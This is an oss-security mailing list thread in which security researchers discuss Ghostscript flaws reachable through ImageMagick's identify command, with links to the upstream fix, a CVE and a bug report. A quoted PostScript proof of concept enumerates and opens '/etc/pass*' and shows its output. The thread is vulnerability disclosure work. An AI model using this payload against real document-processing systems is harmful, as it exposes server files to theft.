Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 29 Sep 2016 05:02:19 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Wed, Sep 28, 2016 at 11:25 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
>
> * Tavis Ormandy:
>
> > Here is the code I'm testing with (Note: I really don't know much
> > postscript - and I hate it).
> >
> > $ cat test.ps
> > /dumpname {
> >     dup             % copy filename
> >     dup             % copy filename
> >     print           % print filename
> >     (\n) print      % print newline
> >     status          % stat filename
> >     {
> >         (stat succeeded\n) print
> >         ( ctime:) print
> >         64 string cvs print
> >         ( atime:) print
> >         64 string cvs print
> >         ( size:) print
> >         64 string cvs print
> >         ( blocks:) print
> >         64 string cvs print
> >         (\n) print
> >         (\n) print
> >     }{
> >         (unable to stat\n\n) print
> >     } ifelse
> >     .libfile        % open as library
> >     {
> >         (.libfile returned file\n\n) print
> >         64 string readstring
> >         pop         % discard result (should proably test)
> >         print
> >         (\n) print
> >     }{
> >         (.libfile returned string\n) print
> >         print
> >         (\n) print
> >     } ifelse
> > } def
> >
> > (/etc/pass*) /dumpname load 256 string filenameforall
>
> filenameforall was fixed as part of this:
>
>   http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
>   http://bugs.ghostscript.com/show_bug.cgi?id=694724
>
> This also covers getenv and has already been assigned CVE-2013-5653.

Thanks Florian, that explains it, although the distros do not appear
to have picked that patch up.

>
> > $ identify test.ps
> > /etc/passwd
> > stat succeeded
> >  ctime:1474998792 atime:1474998792 size:2662 blocks:8
> >
> > .libfile returned file
>
> .libfile is not yet fixed upstream.  I reported this upstream:
>
>   http://bugs.ghostscript.com/show_bug.cgi?id=697169

Thanks - seems like bad news for any automated image/document processing.

Tavis.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ